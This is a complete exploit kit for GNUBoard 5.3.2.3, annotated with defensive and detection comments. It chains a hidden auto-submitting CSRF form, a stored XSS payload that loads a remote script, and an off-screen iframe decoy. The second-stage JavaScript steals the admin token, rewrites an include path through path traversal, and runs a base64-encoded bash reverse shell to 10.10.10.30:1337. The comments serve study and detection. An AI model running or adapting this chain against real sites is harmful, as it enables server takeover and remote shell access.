GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)
-->
<!--
  Auto-submitting cross-site form. It POSTs a group name (fg_name) to the admin
  SMS group-update handler from a page the attacker hosts. The form carries no
  anti-CSRF token field, so the request presumably succeeds on the admin's
  session cookie alone (confirm against the affected version).
  Defender view: the handler should require a per-request token, and the value
  should be attribute-encoded on output (e.g. htmlspecialchars with ENT_QUOTES).
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
// Random number spliced into the stored value below; its purpose is not shown
// here (it looks like a per-submission unique suffix).
var random = Math.round(Math.random() * 1000000000);
// Externally hosted second-stage script that the injected event handler loads.
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
// The value starts with a double quote, so it only has an effect if fg_name is
// later written into a double-quoted HTML attribute without escaping. It then
// adds onfocus + autofocus so the handler fires without user interaction, and
// calls $.getScript, which assumes jQuery is loaded on the page that renders it.
// Detection: stored group names containing a quote followed by onfocus=,
// autofocus or getScript are a direct indicator of this injection.
document.getElementById('payload').value = '" onfocus="$.getScript(\'' + script_url + '\')//10.10.10.60/' + random + '" autofocus value=미분류 ';
// Submits immediately on page load; the visitor never sees or clicks the form.
document.forms[0].submit();
</script>
<!--
Exploit start
-->
<!doctype html>
<html>
<head>
<title>gnuboard5</title>
</head>
<body>
<h1>GNUBoard 5.3.2.3 RCE (Authenticated)</h1>
Date: 2019-01-01<br>
Affected Browsers: Chrome/Firefox/Edge<br>
Affected Version: 5.3 ~ 5.3.2.3<br>
<!--
  Decoy page: exploit.html is loaded in an iframe positioned far off-screen, so
  a logged-in admin who opens this page sees only the text above while the
  framed page submits its form in the background.
  Defender view: the attack depends on the admin session cookie being sent with
  a cross-site POST from a framed third-party page; per-request CSRF tokens on
  admin handlers and SameSite session cookies both break this step.
-->
<iframe id="iframe" src="exploit.html" style="width:100px; height:100px; border:0; border:none; position:absolute; top: -1000px; left: -2000px;"></iframe>
</body>
</html>
/*
CSRF -> RCE Script

Second stage, loaded into the admin page by the injected onfocus handler.
Every URL below is relative, so the requests are same-origin to the admin
panel and carry the admin's session. The chain is stage1 (read token) ->
stage2 (rewrite a content record) -> stage3 (request that content page).
Defender view: once script runs in the admin origin the CSRF token is readable
by it, so the token does not stop stages 1-3; the root cause to fix is the
unescaped fg_name output that lets this script load in the first place.
*/
// Linux Server reverse shell -- Change it to your preferred option
// base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' )
// NOTE: cmd is a shared global that stage3() overwrites with its URL-encoded form.
var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc=';
// Filled in by stage1() from the ajax.token.php response, then sent by stage2().
var ajax_token = '';
// Id of the content record that stage2() rewrites and stage3() requests.
var co_id = 'community';
// Requests the public content page for co_id with an extra `exe` query
// parameter and ignores the response (no handler is attached).
// stage2() has pointed the record's co_include_head at
// ../plugin/okname/hpcert1.php; presumably content.php includes that file and
// the plugin passes `exe` to a shell (the plugin source is not on this page,
// confirm before relying on this).
// Detection: web-server log entries for bbs/content.php that carry an `exe`
// parameter, especially with `base64 -d` piped into a shell, are not produced
// by normal use of the content page.
function stage3(){
// Stage3 : Execute command
// Overwrites the global cmd with its URL-encoded form before building the URL.
cmd = encodeURIComponent(cmd);
var xhr = new XMLHttpRequest();
// %23 is a URL-encoded '#'; presumably it comments out anything the server
// appends after the injected value.
xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '|base64 -d|bash;%23', true);
xhr.send(null);
}
// POSTs a full content-form update for record co_id to the admin handler
// ../contentformupdate.php, using the token obtained by stage1(). The field
// that matters is co_include_head, which is set to a relative path that climbs
// out of its directory (../plugin/okname/hpcert1.php); the other fields are
// ordinary form values. Calls stage3() when the request completes; the HTTP
// status is not checked.
// Defender view: the handler should accept co_include_head / co_include_tail
// only from an allow-list and reject path traversal. For triage, audit stored
// content records for include-head/tail values containing `../` or pointing
// into plugin directories, and review admin logs for unexpected POSTs to
// contentformupdate.php.
function stage2(){
// Stage2 : upload vulnerable script
// post_data is assigned without var/let/const, so it becomes an implicit global.
post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg=';
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
stage3();
}
}
xhr.open('POST', '../contentformupdate.php', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(post_data);
}
// GETs ../ajax.token.php and stores the token from its response in the global
// ajax_token, then calls stage2(). The token is taken by string-splitting on
// `"token":"` and the next double quote rather than by parsing JSON, so a
// response without that marker makes the split chain throw.
// Defender view: this request is same-origin and authenticated as the admin,
// which is why an anti-CSRF token cannot contain the damage once script
// injection into an admin page has succeeded.
function stage1(){
// Stage1 : Get admin token
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
// Text between `"token":"` and the following double quote.
ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0];
stage2();
}
}
xhr.open('GET', '../ajax.token.php', true);
xhr.send(null);
}
// Start from stage1
// Runs as soon as the script is loaded; the stages then chain through their
// XHR completion handlers.
stage1();